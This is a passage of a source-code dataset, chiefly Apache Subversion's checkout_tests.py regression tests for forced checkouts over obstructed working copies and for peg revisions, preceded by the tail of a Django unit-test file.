be = BaseChatterboxEvent()
be.add_template('foo', 'chatterbox_tests/empty_foo.html')
be.add_template('bam', 'chatterbox_tests/empty_bar.html')
self.assertEqual(len(be.templates), 2)
self.assertTrue('foo' in be.templates)
self.assertTrue('bam' in be.templates)
self.assertTrue(be.templates.get('foo') == 'chatterbox_tests/empty_foo.html') # NOQA
def test_add_token(self):
""" ``add_token`` yields the expected data structure.
"""
be = BaseChatterboxEvent()
be.add_token('bam', 'baz')
be.add_token('actor.foo', 42)
be.add_token('bar.baz.boo.jap', 'jahu')
self.assertEqual(be._tokens['bam'], 'baz')
self.assertEqual(be._tokens['actor']['foo'], 42)
self.assertEqual(be._tokens['bar']['baz']['boo']['jap'], 'jahu')
def test_add_nested_token_on_leaf_raises(self):
# TODO(sthzg) implement
# be = BaseChatterboxEvent()
# be.add_token('bam', 'baz')
# be.add_token('bam.foo', 42)
pass
def test_build_tokens_with_dict(self):
""" ``build_tokens()`` resolves variables on current scope correctly.
"""
be = BaseChatterboxEvent()
be.actor = get_test_dict()
be.token_fields = ('actor.foo', 'actor.bar.eggs', 'actor.bar',)
be.build_tokens()
tokens = be._tokens
self.assertEqual(tokens['actor']['foo'], 'ham')
self.assertTrue(isinstance(tokens['actor']['bar'], dict))
self.assertEqual(tokens['actor']['bar']['juice'], False)
self.assertEqual(tokens['actor']['bar']['eggs'], True)
class ChatterboxMailEventTests(SimpleTestCase):
def setUp(self):
self.template_subject = 'chatterbox_tests/email_subject.html'
self.template_body = 'chatterbox_tests/email_body.html'
def tearDown(self):
pass
def test_class_members(self):
""" various behavioral basics work as expected. Might later be split
into smaller and more fragmented test cases.
"""
chatter = MailEventDummyClass()
self.assertEqual(chatter.originator, 'chatterbox_tests')
self.assertEqual(chatter.event, 'Stephan runs unit tests')
self.assertEqual(chatter.mail_from, '[email protected]')
self.assertEqual(chatter.mail_to, '[email protected]')
self.assertEqual(chatter.template_subject, self.template_subject)
self.assertEqual(chatter.template_body, self.template_body)
self.assertTrue('subject' in chatter.templates)
self.assertTrue('body' in chatter.templates)
| mit | -7,214,503,491,187,462,000 | 36.426829 | 93 | 0.633105 | false |
YueLinHo/Subversion | subversion/tests/cmdline/checkout_tests.py | 2 | 48298 | #!/usr/bin/env python
#
# checkout_tests.py: Testing checkout --force behavior when local
# tree already exits.
#
# Subversion is a tool for revision control.
# See http://subversion.apache.org for more information.
#
# ====================================================================
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
######################################################################
# General modules
import sys, re, os, time, subprocess
import datetime
# Our testing module
import svntest
from svntest import wc, actions
import logging
# (abbreviation)
Skip = svntest.testcase.Skip_deco
SkipUnless = svntest.testcase.SkipUnless_deco
XFail = svntest.testcase.XFail_deco
Issues = svntest.testcase.Issues_deco
Issue = svntest.testcase.Issue_deco
Wimp = svntest.testcase.Wimp_deco
Item = wc.StateItem
logger = logging.getLogger()
#----------------------------------------------------------------------
# Helper function for testing stderr from co.
# If none of the strings in the STDERR list matches the regular expression
# RE_STRING, raise an error.
def test_stderr(re_string, stderr):
exp_err_re = re.compile(re_string)
for line in stderr:
if exp_err_re.search(line):
return
for x in stderr:
logger.debug(x[:-1])
logger.info("Expected stderr reg-ex: '" + re_string + "'")
raise svntest.Failure("Checkout failed but not in the expected way")
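# Illustrative usage (not part of the original suite): the helper above takes
# a pattern and a list of output lines, e.g.
#   test_stderr("URL: " + sbox.repo_url + '$', sout)
# and raises svntest.Failure when no line matches the pattern.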
#----------------------------------------------------------------------
# Helper function to set up an existing local tree that has paths which
# obstruct with the incoming WC.
#
# Build a sandbox SBOX without a WC. Create the following paths
# rooted at SBOX.WC_DIR:
#
# iota
# A/
# A/mu
#
# If MOD_FILES is FALSE, 'iota' and 'A/mu' have the same contents as the
# standard greek tree. If TRUE the contents of each are set as follows:
#
# iota : contents == "This is the local version of the file 'iota'.\n"
# A/mu : contents == "This is the local version of the file 'mu'.\n"
#
# If ADD_UNVERSIONED is TRUE, add the following files and directories,
# rooted in SBOX.WC_DIR, that don't exist in the standard greek tree:
#
# 'sigma'
# 'A/upsilon'
# 'A/Z/'
#
# Return the expected output for svn co --force SBOX.REPO_URL SBOX.WC_DIR
#
def make_local_tree(sbox, mod_files=False, add_unversioned=False):
"""Make a local unversioned tree to checkout into."""
sbox.build(create_wc = False)
if os.path.exists(sbox.wc_dir):
svntest.main.safe_rmtree(sbox.wc_dir)
export_target = sbox.wc_dir
expected_output = svntest.main.greek_state.copy()
expected_output.wc_dir = sbox.wc_dir
expected_output.desc[""] = Item()
expected_output.tweak(contents=None, status="A ")
# Export an unversioned tree to sbox.wc_dir.
svntest.actions.run_and_verify_export(sbox.repo_url,
export_target,
expected_output,
svntest.main.greek_state.copy())
# Remove everything remaining except for 'iota', 'A/', and 'A/mu'.
svntest.main.safe_rmtree(os.path.join(sbox.wc_dir, "A", "B"))
svntest.main.safe_rmtree(os.path.join(sbox.wc_dir, "A", "C"))
svntest.main.safe_rmtree(os.path.join(sbox.wc_dir, "A", "D"))
# Should obstructions differ from the standard greek tree?
if mod_files:
iota_path = os.path.join(sbox.wc_dir, "iota")
mu_path = os.path.join(sbox.wc_dir, "A", "mu")
svntest.main.file_write(iota_path,
"This is the local version of the file 'iota'.\n")
svntest.main.file_write(mu_path,
"This is the local version of the file 'mu'.\n")
  # Add some files that won't obstruct anything in the standard greek tree.
if add_unversioned:
sigma_path = os.path.join(sbox.wc_dir, "sigma")
svntest.main.file_append(sigma_path, "unversioned sigma")
upsilon_path = os.path.join(sbox.wc_dir, "A", "upsilon")
svntest.main.file_append(upsilon_path, "unversioned upsilon")
Z_path = os.path.join(sbox.wc_dir, "A", "Z")
os.mkdir(Z_path)
return wc.State(sbox.wc_dir, {
"A" : Item(status='E '), # Obstruction
"A/B" : Item(status='A '),
"A/B/lambda" : Item(status='A '),
"A/B/E" : Item(status='A '),
"A/B/E/alpha" : Item(status='A '),
"A/B/E/beta" : Item(status='A '),
"A/B/F" : Item(status='A '),
"A/mu" : Item(status='E '), # Obstruction
"A/C" : Item(status='A '),
"A/D" : Item(status='A '),
"A/D/gamma" : Item(status='A '),
"A/D/G" : Item(status='A '),
"A/D/G/pi" : Item(status='A '),
"A/D/G/rho" : Item(status='A '),
"A/D/G/tau" : Item(status='A '),
"A/D/H" : Item(status='A '),
"A/D/H/chi" : Item(status='A '),
"A/D/H/omega" : Item(status='A '),
"A/D/H/psi" : Item(status='A '),
"iota" : Item(status='E '), # Obstruction
})
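# Illustrative sketch (not part of the original suite): how the helper above
# is typically consumed by the tests below; the function name is hypothetical.
def _example_make_local_tree_usage(sbox):
  """Sketch: forced checkout over the faux obstructions built above."""
  expected_output = make_local_tree(sbox, mod_files=False, add_unversioned=False)
  expected_wc = svntest.main.greek_state.copy()
  svntest.actions.run_and_verify_checkout(sbox.repo_url, sbox.wc_dir,
                                          expected_output, expected_wc,
                                          [], '--force')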
######################################################################
# Tests
#
# Each test must return on success or raise on failure.
#----------------------------------------------------------------------
def checkout_with_obstructions(sbox):
"""co with obstructions conflicts without --force"""
make_local_tree(sbox, False, False)
#svntest.factory.make(sbox,
# """# Checkout with unversioned obstructions lying around.
# svn co url wc_dir
# svn status""")
#svntest.factory.make(sbox,
# """# Now see to it that we can recover from the obstructions.
# rm -rf A iota
# svn up""")
#exit(0)
wc_dir = sbox.wc_dir
url = sbox.repo_url
# Checkout with unversioned obstructions causes tree conflicts.
# svn co url wc_dir
expected_output = svntest.wc.State(wc_dir, {
'iota' : Item(status=' ', treeconflict='C'),
'A' : Item(status=' ', treeconflict='C'),
# And the updates below the tree conflict
'A/D' : Item(status=' ', treeconflict='A'),
'A/D/gamma' : Item(status=' ', treeconflict='A'),
'A/D/G' : Item(status=' ', treeconflict='A'),
'A/D/G/rho' : Item(status=' ', treeconflict='A'),
'A/D/G/pi' : Item(status=' ', treeconflict='A'),
'A/D/G/tau' : Item(status=' ', treeconflict='A'),
'A/D/H' : Item(status=' ', treeconflict='A'),
'A/D/H/chi' : Item(status=' ', treeconflict='A'),
'A/D/H/omega' : Item(status=' ', treeconflict='A'),
'A/D/H/psi' : Item(status=' ', treeconflict='A'),
'A/B' : Item(status=' ', treeconflict='A'),
'A/B/E' : Item(status=' ', treeconflict='A'),
'A/B/E/beta' : Item(status=' ', treeconflict='A'),
'A/B/E/alpha' : Item(status=' ', treeconflict='A'),
'A/B/F' : Item(status=' ', treeconflict='A'),
'A/B/lambda' : Item(status=' ', treeconflict='A'),
'A/C' : Item(status=' ', treeconflict='A'),
'A/mu' : Item(status=' ', treeconflict='A'),
})
expected_disk = svntest.main.greek_state.copy()
expected_disk.remove('A/B', 'A/B/E', 'A/B/E/beta', 'A/B/E/alpha', 'A/B/F',
'A/B/lambda', 'A/D', 'A/D/G', 'A/D/G/rho', 'A/D/G/pi', 'A/D/G/tau',
'A/D/H', 'A/D/H/psi', 'A/D/H/omega', 'A/D/H/chi', 'A/D/gamma', 'A/C')
actions.run_and_verify_checkout(url, wc_dir, expected_output,
expected_disk)
# svn status
expected_status = actions.get_virginal_state(wc_dir, 1)
# A and iota are tree conflicted and obstructed
expected_status.tweak('A', 'iota', status='D ', wc_rev=1,
treeconflict='C')
expected_status.tweak('A/D', 'A/D/G', 'A/D/G/rho', 'A/D/G/pi', 'A/D/G/tau',
'A/D/H', 'A/D/H/chi', 'A/D/H/omega', 'A/D/H/psi', 'A/D/gamma', 'A/B',
'A/B/E', 'A/B/E/beta', 'A/B/E/alpha', 'A/B/F', 'A/B/lambda', 'A/C',
status='D ')
# A/mu exists on disk, but is deleted
expected_status.tweak('A/mu', status='D ')
actions.run_and_verify_unquiet_status(wc_dir, expected_status)
# Now see to it that we can recover from the obstructions.
# rm -rf A iota
svntest.main.safe_rmtree( os.path.join(wc_dir, 'A') )
os.remove( os.path.join(wc_dir, 'iota') )
svntest.main.run_svn(None, 'revert', '-R', os.path.join(wc_dir, 'A'),
os.path.join(wc_dir, 'iota'))
# svn up
expected_output = svntest.wc.State(wc_dir, {
})
expected_disk = svntest.main.greek_state.copy()
expected_status = actions.get_virginal_state(wc_dir, 1)
actions.run_and_verify_update(wc_dir, expected_output, expected_disk,
expected_status,)
#----------------------------------------------------------------------
def forced_checkout_of_file_with_dir_obstructions(sbox):
"""forced co flags conflict if a dir obstructs a file"""
# svntest.factory.make(sbox,
# """mkdir $WC_DIR.other/iota
# svn co --force url $WC_DIR.other """)
sbox.build()
url = sbox.repo_url
wc_dir_other = sbox.add_wc_path('other')
other_iota = os.path.join(wc_dir_other, 'iota')
# mkdir $WC_DIR.other/iota
os.makedirs(other_iota)
# svn co --force url $WC_DIR.other
expected_output = svntest.wc.State(wc_dir_other, {
'A' : Item(status='A '),
'A/B' : Item(status='A '),
'A/B/E' : Item(status='A '),
'A/B/E/alpha' : Item(status='A '),
'A/B/E/beta' : Item(status='A '),
'A/B/F' : Item(status='A '),
'A/B/lambda' : Item(status='A '),
'A/D' : Item(status='A '),
'A/D/H' : Item(status='A '),
'A/D/H/chi' : Item(status='A '),
'A/D/H/omega' : Item(status='A '),
'A/D/H/psi' : Item(status='A '),
'A/D/G' : Item(status='A '),
'A/D/G/pi' : Item(status='A '),
'A/D/G/rho' : Item(status='A '),
'A/D/G/tau' : Item(status='A '),
'A/D/gamma' : Item(status='A '),
'A/C' : Item(status='A '),
'A/mu' : Item(status='A '),
'iota' : Item(status=' ', treeconflict='C'),
})
expected_disk = svntest.main.greek_state.copy()
expected_disk.tweak('iota', contents=None)
actions.run_and_verify_checkout(url, wc_dir_other, expected_output,
expected_disk, [], '--force')
#----------------------------------------------------------------------
def forced_checkout_of_dir_with_file_obstructions(sbox):
"""forced co flags conflict if a file obstructs a dir"""
make_local_tree(sbox, False, False)
#svntest.factory.make(sbox,"""
# mkdir wc_dir_other
# echo "The file A" > wc_dir_other/A
# svn co --force url wc_dir_other
# """)
#svntest.factory.make(sbox,"""
# # Now see to it that we can recover from the obstructions.
# rm wc_dir_other/A
# svn up wc_dir_other""")
#exit(0)
url = sbox.repo_url
wc_dir_other = sbox.add_wc_path('other')
other_A = os.path.join(wc_dir_other, 'A')
# mkdir wc_dir_other
os.makedirs(wc_dir_other)
# echo "The file A" > wc_dir_other/A
svntest.main.file_write(other_A, 'The file A\n')
# svn co --force url wc_dir_other
expected_output = svntest.wc.State(wc_dir_other, {
'iota' : Item(status='A '),
'A' : Item(status=' ', treeconflict='C'),
# And what happens below A
'A/mu' : Item(status=' ', treeconflict='A'),
'A/D' : Item(status=' ', treeconflict='A'),
'A/D/G' : Item(status=' ', treeconflict='A'),
'A/D/G/tau' : Item(status=' ', treeconflict='A'),
'A/D/G/pi' : Item(status=' ', treeconflict='A'),
'A/D/G/rho' : Item(status=' ', treeconflict='A'),
'A/D/H' : Item(status=' ', treeconflict='A'),
'A/D/H/psi' : Item(status=' ', treeconflict='A'),
'A/D/H/omega' : Item(status=' ', treeconflict='A'),
'A/D/H/chi' : Item(status=' ', treeconflict='A'),
'A/D/gamma' : Item(status=' ', treeconflict='A'),
'A/C' : Item(status=' ', treeconflict='A'),
'A/B' : Item(status=' ', treeconflict='A'),
'A/B/E' : Item(status=' ', treeconflict='A'),
'A/B/E/beta' : Item(status=' ', treeconflict='A'),
'A/B/E/alpha' : Item(status=' ', treeconflict='A'),
'A/B/F' : Item(status=' ', treeconflict='A'),
'A/B/lambda' : Item(status=' ', treeconflict='A'),
})
expected_disk = svntest.main.greek_state.copy()
expected_disk.remove('A/B', 'A/B/E', 'A/B/E/beta', 'A/B/E/alpha', 'A/B/F',
'A/B/lambda', 'A/D', 'A/D/G', 'A/D/G/rho', 'A/D/G/pi', 'A/D/G/tau',
'A/D/H', 'A/D/H/psi', 'A/D/H/omega', 'A/D/H/chi', 'A/D/gamma', 'A/mu',
'A/C')
expected_disk.tweak('A', contents='The file A\n')
actions.run_and_verify_checkout(url, wc_dir_other, expected_output,
expected_disk, [], '--force')
# Now see to it that we can recover from the obstructions.
# rm wc_dir_other/A
os.remove(other_A)
# svn up wc_dir_other
expected_output = svntest.wc.State(wc_dir_other, {
})
expected_disk = svntest.main.greek_state.copy()
expected_status = actions.get_virginal_state(wc_dir_other, 1)
svntest.main.run_svn(None, 'revert', '-R', os.path.join(wc_dir_other, 'A'))
actions.run_and_verify_update(wc_dir_other, expected_output, expected_disk,
expected_status)
#----------------------------------------------------------------------
def forced_checkout_with_faux_obstructions(sbox):
"""co with faux obstructions ok with --force"""
# Make a local tree that partially obstructs the paths coming from the
# repos but has no true differences.
expected_output = make_local_tree(sbox, False, False)
expected_wc = svntest.main.greek_state.copy()
svntest.actions.run_and_verify_checkout(sbox.repo_url,
sbox.wc_dir, expected_output,
expected_wc, [], '--force')
#----------------------------------------------------------------------
def forced_checkout_with_real_obstructions(sbox):
"""co with real obstructions ok with --force"""
# Make a local tree that partially obstructs the paths coming from the
# repos and make the obstructing files different from the standard greek
# tree.
expected_output = make_local_tree(sbox, True, False)
expected_wc = svntest.main.greek_state.copy()
expected_wc.tweak('A/mu',
contents="This is the local version of the file 'mu'.\n")
expected_wc.tweak('iota',
contents="This is the local version of the file 'iota'.\n")
svntest.actions.run_and_verify_checkout(sbox.repo_url,
sbox.wc_dir, expected_output,
expected_wc, [], '--force')
#----------------------------------------------------------------------
def forced_checkout_with_real_obstructions_and_unversioned_files(sbox):
"""co with real obstructions and unversioned files"""
# Make a local tree that partially obstructs the paths coming from the
# repos, make the obstructing files different from the standard greek
  # tree, and finally add some files that don't exist in the standard tree.
expected_output = make_local_tree(sbox, True, True)
expected_wc = svntest.main.greek_state.copy()
expected_wc.tweak('A/mu',
contents="This is the local version of the file 'mu'.\n")
expected_wc.tweak('iota',
contents="This is the local version of the file 'iota'.\n")
expected_wc.add({'sigma' : Item("unversioned sigma"),
'A/upsilon' : Item("unversioned upsilon"),
'A/Z' : Item(),
})
svntest.actions.run_and_verify_checkout(sbox.repo_url,
sbox.wc_dir, expected_output,
expected_wc, [], '--force')
#----------------------------------------------------------------------
def forced_checkout_with_versioned_obstruction(sbox):
"""forced co with versioned obstruction"""
# Make a greek tree working copy
sbox.build(read_only = True)
# Create a second repository with the same greek tree
repo_dir = sbox.repo_dir
repo_url = sbox.repo_url
other_repo_dir, other_repo_url = sbox.add_repo_path("other")
svntest.main.copy_repos(repo_dir, other_repo_dir, 1, 1)
fresh_wc_dir = sbox.add_wc_path('fresh')
fresh_wc_dir_A = os.path.join(fresh_wc_dir, 'A')
os.mkdir(fresh_wc_dir)
other_wc_dir = sbox.add_wc_path("other")
other_wc_dir_A = os.path.join(other_wc_dir, "A")
os.mkdir(other_wc_dir)
# Checkout "A" from the first repos to a fresh dir.
svntest.actions.run_and_verify_svn(svntest.verify.AnyOutput, [],
"co", repo_url + "/A",
fresh_wc_dir_A)
# Checkout "A" from the second repos to the other dir.
svntest.actions.run_and_verify_svn(svntest.verify.AnyOutput, [],
"co", other_repo_url + "/A",
other_wc_dir_A)
# Checkout the entire first repos into the fresh dir. This should
# fail because A is already checked out. (Ideally, we'd silently
# incorporate A's working copy into its parent working copy.)
expected_output = svntest.wc.State(fresh_wc_dir, {
'iota' : Item(status='A '),
'A' : Item(verb='Skipped'),
})
expected_wc = svntest.main.greek_state.copy()
svntest.actions.run_and_verify_checkout(repo_url, fresh_wc_dir,
expected_output, expected_wc,
[], '--force')
# Checkout the entire first repos into the other dir. This should
# fail because it's a different repository.
expected_output = svntest.wc.State(other_wc_dir, {
'iota' : Item(status='A '),
'A' : Item(verb='Skipped'),
})
expected_wc = svntest.main.greek_state.copy()
svntest.actions.run_and_verify_checkout(repo_url, other_wc_dir,
expected_output, expected_wc,
[], '--force')
#ensure that other_wc_dir_A is not affected by this forced checkout.
svntest.actions.run_and_verify_svn(None,
[], "st", other_wc_dir_A)
exit_code, sout, serr = svntest.actions.run_and_verify_svn(
None, [], "info",
other_wc_dir_A)
#TODO rename test_stderr to test_regex or something.
test_stderr("URL: " + other_repo_url + '/A$', sout)
#ensure that other_wc_dir is in a consistent state though it may be
#missing few items.
exit_code, sout, serr = svntest.actions.run_and_verify_svn(
None, [], "info",
other_wc_dir)
#TODO rename test_stderr to test_regex or something.
test_stderr("URL: " + sbox.repo_url + '$', sout)
#----------------------------------------------------------------------
# Ensure that an import followed by a checkout in place works correctly.
def import_and_checkout(sbox):
"""import and checkout"""
sbox.build(read_only = True)
other_repo_dir, other_repo_url = sbox.add_repo_path("other")
import_from_dir = sbox.add_wc_path("other")
# Export greek tree to import_from_dir
expected_output = svntest.main.greek_state.copy()
expected_output.wc_dir = import_from_dir
expected_output.desc[''] = Item()
expected_output.tweak(contents=None, status='A ')
svntest.actions.run_and_verify_export(sbox.repo_url,
import_from_dir,
expected_output,
svntest.main.greek_state.copy())
# Create the 'other' repos
svntest.main.create_repos(other_repo_dir)
# Import import_from_dir to the other repos
expected_output = svntest.wc.State(sbox.wc_dir, {})
svntest.actions.run_and_verify_svn(None, [], 'import',
'-m', 'import', import_from_dir,
other_repo_url)
expected_output = wc.State(import_from_dir, {
"A" : Item(status='E '),
"A/B" : Item(status='E '),
"A/B/lambda" : Item(status='E '),
"A/B/E" : Item(status='E '),
"A/B/E/alpha" : Item(status='E '),
"A/B/E/beta" : Item(status='E '),
"A/B/F" : Item(status='E '),
"A/mu" : Item(status='E '),
"A/C" : Item(status='E '),
"A/D" : Item(status='E '),
"A/D/gamma" : Item(status='E '),
"A/D/G" : Item(status='E '),
"A/D/G/pi" : Item(status='E '),
"A/D/G/rho" : Item(status='E '),
"A/D/G/tau" : Item(status='E '),
"A/D/H" : Item(status='E '),
"A/D/H/chi" : Item(status='E '),
"A/D/H/omega" : Item(status='E '),
"A/D/H/psi" : Item(status='E '),
"iota" : Item(status='E ')
})
expected_wc = svntest.main.greek_state.copy()
svntest.actions.run_and_verify_checkout(other_repo_url, import_from_dir,
expected_output, expected_wc,
[], '--force')
#----------------------------------------------------------------------
# Issue #2529.
@Issue(2529)
def checkout_broken_eol(sbox):
"checkout file with broken eol style"
svntest.actions.load_repo(sbox, os.path.join(os.path.dirname(sys.argv[0]),
'update_tests_data',
'checkout_broken_eol.dump'),
create_wc=False)
URL = sbox.repo_url
expected_output = svntest.wc.State(sbox.wc_dir, {
'file': Item(status='A '),
})
expected_wc = svntest.wc.State('', {
'file': Item(contents='line\nline2\n'),
})
svntest.actions.run_and_verify_checkout(URL,
sbox.wc_dir,
expected_output,
expected_wc)
def checkout_creates_intermediate_folders(sbox):
"checkout and create some intermediate folders"
sbox.build(create_wc = False, read_only = True)
checkout_target = os.path.join(sbox.wc_dir, 'a', 'b', 'c')
# checkout a working copy in a/b/c, should create these intermediate
# folders
expected_output = svntest.main.greek_state.copy()
expected_output.wc_dir = checkout_target
expected_output.tweak(status='A ', contents=None)
expected_wc = svntest.main.greek_state
svntest.actions.run_and_verify_checkout(sbox.repo_url,
checkout_target,
expected_output,
expected_wc)
# Test that, if a peg revision is provided without an explicit revision,
# svn will checkout the directory as it was at rPEG, rather than at HEAD.
def checkout_peg_rev(sbox):
"checkout with peg revision"
sbox.build()
wc_dir = sbox.wc_dir
# create a new revision
mu_path = os.path.join(wc_dir, 'A', 'mu')
svntest.main.file_append(mu_path, 'appended mu text')
svntest.actions.run_and_verify_svn(None, [],
'ci', '-m', 'changed file mu', wc_dir)
# now checkout the repo@1 in another folder, this should create our initial
# wc without the change in mu.
checkout_target = sbox.add_wc_path('checkout')
os.mkdir(checkout_target)
expected_output = svntest.main.greek_state.copy()
expected_output.wc_dir = checkout_target
expected_output.tweak(status='A ', contents=None)
expected_wc = svntest.main.greek_state.copy()
svntest.actions.run_and_verify_checkout(sbox.repo_url + '@1',
checkout_target,
expected_output,
expected_wc)
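# Illustrative note (not part of the original suite): the "repo_url + '@1'"
# form used above is the same peg-revision syntax accepted on the command
# line, e.g. "svn checkout http://host/repos@1 wc" checks out the tree as it
# was in r1 rather than at HEAD.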
#----------------------------------------------------------------------
# Issue 2602: Test that peg revision dates are correctly supported.
@Issue(2602)
def checkout_peg_rev_date(sbox):
"checkout with peg revision date"
sbox.build()
wc_dir = sbox.wc_dir
## Get svn:date.
exit_code, output, errput = svntest.main.run_svn(None, 'propget', 'svn:date',
'--revprop', '-r1',
'--no-newline',
sbox.repo_url)
if exit_code or errput != [] or len(output) != 1:
raise svntest.Failure("svn:date propget failed")
r1_string = output[0]
## Increment the svn:date date by one microsecond.
# TODO: pass tzinfo=UTC to datetime.datetime()
date_pattern = re.compile(r'(\d+)-(\d+)-(\d+)T(\d\d):(\d\d):(\d\d)\.(\d+)Z$')
r1_time = datetime.datetime(*map(int, date_pattern.match(r1_string).groups()))
peg_time = r1_time + datetime.timedelta(microseconds=1)
assert r1_time != peg_time
  # peg_string is, in all likelihood, younger than r1's svn:date and older than
# r2's svn:date. It is also not equal to either of them, so we test the
# binary search of svn:date values.
peg_string = '%04d-%02d-%02dT%02d:%02d:%02d.%06dZ' % \
tuple(getattr(peg_time, x)
for x in ["year", "month", "day", "hour", "minute",
"second", "microsecond"])
# create a new revision
mu_path = os.path.join(wc_dir, 'A', 'mu')
svntest.main.file_append(mu_path, 'appended mu text')
svntest.actions.run_and_verify_svn(None, [],
'ci', '-m', 'changed file mu', wc_dir)
# now checkout the repo@peg_string in another folder, this should create our
# initial wc without the change in mu.
checkout_target = sbox.add_wc_path('checkout')
os.mkdir(checkout_target)
expected_output = svntest.main.greek_state.copy()
expected_output.wc_dir = checkout_target
expected_output.tweak(status='A ', contents=None)
expected_wc = svntest.main.greek_state.copy()
# use an old date to checkout, that way we're sure we get the first revision
svntest.actions.run_and_verify_checkout(sbox.repo_url +
'@{' + peg_string + '}',
checkout_target,
expected_output,
expected_wc)
# now try another checkout with repo@r1_string
checkout_target = sbox.add_wc_path('checkout2')
os.mkdir(checkout_target)
expected_output = svntest.main.greek_state.copy()
expected_output.wc_dir = checkout_target
expected_output.tweak(status='A ', contents=None)
expected_wc = svntest.main.greek_state.copy()
# use an old date to checkout, that way we're sure we get the first revision
svntest.actions.run_and_verify_checkout(sbox.repo_url +
'@{' + r1_string + '}',
checkout_target,
expected_output,
expected_wc)
#----------------------------------------------------------------------
def co_with_obstructing_local_adds(sbox):
"co handles obstructing paths scheduled for add"
sbox.build()
wc_dir = sbox.wc_dir
# Make a backup copy of the working copy
wc_backup = sbox.add_wc_path('backup')
svntest.actions.duplicate_dir(wc_dir, wc_backup)
# Add files and dirs to the repos via the first WC. Each of these
# will be added to the backup WC via a checkout:
#
# A/B/upsilon: Identical to the file scheduled for addition in
# the backup WC.
#
# A/C/nu: A "normal" add, won't exist in the backup WC.
#
# A/D/kappa: Conflicts with the file scheduled for addition in
# the backup WC.
#
# A/D/H/I: New dirs that will also be scheduled for addition
# A/D/H/I/J: in the backup WC.
# A/D/H/I/K:
#
# A/D/H/I/L: A "normal" dir add, won't exist in the backup WC.
#
# A/D/H/I/K/xi: Identical to the file scheduled for addition in
# the backup WC.
#
# A/D/H/I/K/eta: Conflicts with the file scheduled for addition in
# the backup WC.
upsilon_path = os.path.join(wc_dir, 'A', 'B', 'upsilon')
svntest.main.file_append(upsilon_path, "This is the file 'upsilon'\n")
nu_path = os.path.join(wc_dir, 'A', 'C', 'nu')
svntest.main.file_append(nu_path, "This is the file 'nu'\n")
kappa_path = os.path.join(wc_dir, 'A', 'D', 'kappa')
svntest.main.file_append(kappa_path, "This is REPOS file 'kappa'\n")
I_path = os.path.join(wc_dir, 'A', 'D', 'H', 'I')
os.mkdir(I_path)
J_path = os.path.join(I_path, 'J')
os.mkdir(J_path)
K_path = os.path.join(I_path, 'K')
os.mkdir(K_path)
L_path = os.path.join(I_path, 'L')
os.mkdir(L_path)
xi_path = os.path.join(K_path, 'xi')
svntest.main.file_append(xi_path, "This is file 'xi'\n")
eta_path = os.path.join(K_path, 'eta')
svntest.main.file_append(eta_path, "This is REPOS file 'eta'\n")
svntest.main.run_svn(None, 'add', upsilon_path, nu_path,
kappa_path, I_path)
  # Create expected output tree for 'svn ci'
expected_output = wc.State(wc_dir, {
'A/B/upsilon' : Item(verb='Adding'),
'A/C/nu' : Item(verb='Adding'),
'A/D/kappa' : Item(verb='Adding'),
'A/D/H/I' : Item(verb='Adding'),
'A/D/H/I/J' : Item(verb='Adding'),
'A/D/H/I/K' : Item(verb='Adding'),
'A/D/H/I/K/xi' : Item(verb='Adding'),
'A/D/H/I/K/eta' : Item(verb='Adding'),
'A/D/H/I/L' : Item(verb='Adding'),
})
# Create expected status tree.
expected_status = svntest.actions.get_virginal_state(wc_dir, 1)
expected_status.add({
'A/B/upsilon' : Item(status=' ', wc_rev=2),
'A/C/nu' : Item(status=' ', wc_rev=2),
'A/D/kappa' : Item(status=' ', wc_rev=2),
'A/D/H/I' : Item(status=' ', wc_rev=2),
'A/D/H/I/J' : Item(status=' ', wc_rev=2),
'A/D/H/I/K' : Item(status=' ', wc_rev=2),
'A/D/H/I/K/xi' : Item(status=' ', wc_rev=2),
'A/D/H/I/K/eta' : Item(status=' ', wc_rev=2),
'A/D/H/I/L' : Item(status=' ', wc_rev=2),
})
# Commit.
svntest.actions.run_and_verify_commit(wc_dir, expected_output,
expected_status)
# Create various paths scheduled for addition which will obstruct
# the adds coming from the repos.
upsilon_backup_path = os.path.join(wc_backup, 'A', 'B', 'upsilon')
svntest.main.file_append(upsilon_backup_path,
"This is the file 'upsilon'\n")
kappa_backup_path = os.path.join(wc_backup, 'A', 'D', 'kappa')
svntest.main.file_append(kappa_backup_path,
"This is WC file 'kappa'\n")
I_backup_path = os.path.join(wc_backup, 'A', 'D', 'H', 'I')
os.mkdir(I_backup_path)
J_backup_path = os.path.join(I_backup_path, 'J')
os.mkdir(J_backup_path)
K_backup_path = os.path.join(I_backup_path, 'K')
os.mkdir(K_backup_path)
xi_backup_path = os.path.join(K_backup_path, 'xi')
svntest.main.file_append(xi_backup_path, "This is file 'xi'\n")
eta_backup_path = os.path.join(K_backup_path, 'eta')
svntest.main.file_append(eta_backup_path, "This is WC file 'eta'\n")
svntest.main.run_svn(None, 'add',
upsilon_backup_path,
kappa_backup_path,
I_backup_path)
# Create expected output tree for a checkout of the wc_backup.
expected_output = wc.State(wc_backup, {
'A/B/upsilon' : Item(status='E '),
'A/C/nu' : Item(status='A '),
'A/D/H/I' : Item(status='E '),
'A/D/H/I/J' : Item(status='E '),
'A/D/H/I/K' : Item(status='E '),
'A/D/H/I/K/xi' : Item(status='E '),
'A/D/H/I/K/eta' : Item(status='C '),
'A/D/H/I/L' : Item(status='A '),
'A/D/kappa' : Item(status='C '),
})
# Create expected disk for checkout of wc_backup.
expected_disk = svntest.main.greek_state.copy()
expected_disk.add({
'A/B/upsilon' : Item("This is the file 'upsilon'\n"),
'A/C/nu' : Item("This is the file 'nu'\n"),
'A/D/H/I' : Item(),
'A/D/H/I/J' : Item(),
'A/D/H/I/K' : Item(),
'A/D/H/I/K/xi' : Item("This is file 'xi'\n"),
'A/D/H/I/K/eta' : Item("\n".join(["<<<<<<< .mine",
"This is WC file 'eta'",
"||||||| .r0",
"=======",
"This is REPOS file 'eta'",
">>>>>>> .r2",
""])),
'A/D/H/I/L' : Item(),
'A/D/kappa' : Item("\n".join(["<<<<<<< .mine",
"This is WC file 'kappa'",
"||||||| .r0",
"=======",
"This is REPOS file 'kappa'",
">>>>>>> .r2",
""])),
})
